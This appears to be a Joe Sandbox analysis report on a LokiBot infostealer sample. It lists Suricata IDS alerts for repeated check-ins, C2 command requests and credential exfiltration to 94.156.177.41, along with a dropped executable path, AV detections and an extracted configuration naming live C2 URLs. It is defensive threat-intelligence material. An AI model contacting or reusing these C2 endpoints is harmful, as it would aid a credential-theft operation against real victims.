2024-11-28T13:53:37.671479+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:39.517673+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:41.214371+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:43.433051+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:45.291369+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:47.149209+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:48.834119+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:50.737812+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:52.603990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:54.504785+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:56.356808+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:58.089738+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:59.992228+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:54:01.812286+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:03.511707+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T13:52:04.479690+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:06.410511+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:08.237689+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:10.072483+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:11.973667+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:13.689499+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:15.393770+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:17.219155+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:19.113785+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:20.813749+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:22.659042+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:24.549789+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:26.365633+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:28.268944+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:29.992184+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:31.691657+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:33.568487+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:35.425401+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:37.177766+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:38.836045+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:40.534388+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:42.351772+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:44.168555+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:46.067495+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:48.007586+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:49.915881+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:51.665645+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:53.728329+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:55.529063+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:58.217591+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:53:00.334231+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:02.019879+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:03.878356+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:05.737923+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:07.602577+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:09.650403+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:11.943752+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:13.787378+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:15.696851+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:17.383644+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:19.396128+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:21.301001+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:23.160248+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:24.944914+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:26.713138+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:28.528184+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:30.675910+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:32.490598+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:34.319262+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49913	94.156.177.41	80	TCP
2024-11-28T13:53:36.174269+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:38.049671+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:39.893533+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:42.038877+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:43.814508+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:45.677207+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:47.609817+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:49.229391+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:51.134807+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:52.989363+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:54.895598+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:56.768164+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:58.476192+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:54:00.536337+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:02.191446+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49984	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T13:52:04.479690+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:06.410511+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:08.237689+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:10.072483+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:11.973667+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:13.689499+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:15.393770+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:17.219155+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:19.113785+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:20.813749+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:22.659042+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:24.549789+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:26.365633+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:28.268944+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:29.992184+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:31.691657+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:33.568487+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:35.425401+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:37.177766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:38.836045+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:40.534388+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:42.351772+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:44.168555+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:46.067495+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:48.007586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:49.915881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:51.665645+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:53.728329+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:55.529063+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:58.217591+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:53:00.334231+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:02.019879+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:03.878356+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:05.737923+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:07.602577+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:09.650403+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:11.943752+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:13.787378+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:15.696851+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:17.383644+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:19.396128+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:21.301001+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:23.160248+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:24.944914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:26.713138+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:28.528184+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:30.675910+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:32.490598+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:34.319262+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49913	94.156.177.41	80	TCP
2024-11-28T13:53:36.174269+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:38.049671+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:39.893533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:42.038877+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:43.814508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:45.677207+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:47.609817+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:49.229391+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:51.134807+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:52.989363+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:54.895598+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:56.768164+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:58.476192+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:54:00.536337+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:02.191446+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/soja/five/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: FVR-N2411-07396.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FVR-N2411-07396.exe

Joe Sandbox ML: detected

Source: FVR-N2411-07396.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FVR-N2411-07396.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: yRKC.pdbSHA256z3 source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr
Source:	Binary string: yRKC.pdb source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 4x nop then jmp 0720B48Bh		0_2_0720AD0B
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 4x nop then jmp 0810A733h		8_2_08109FB3

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49713
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49712
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49745
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 94.156.177.41:80
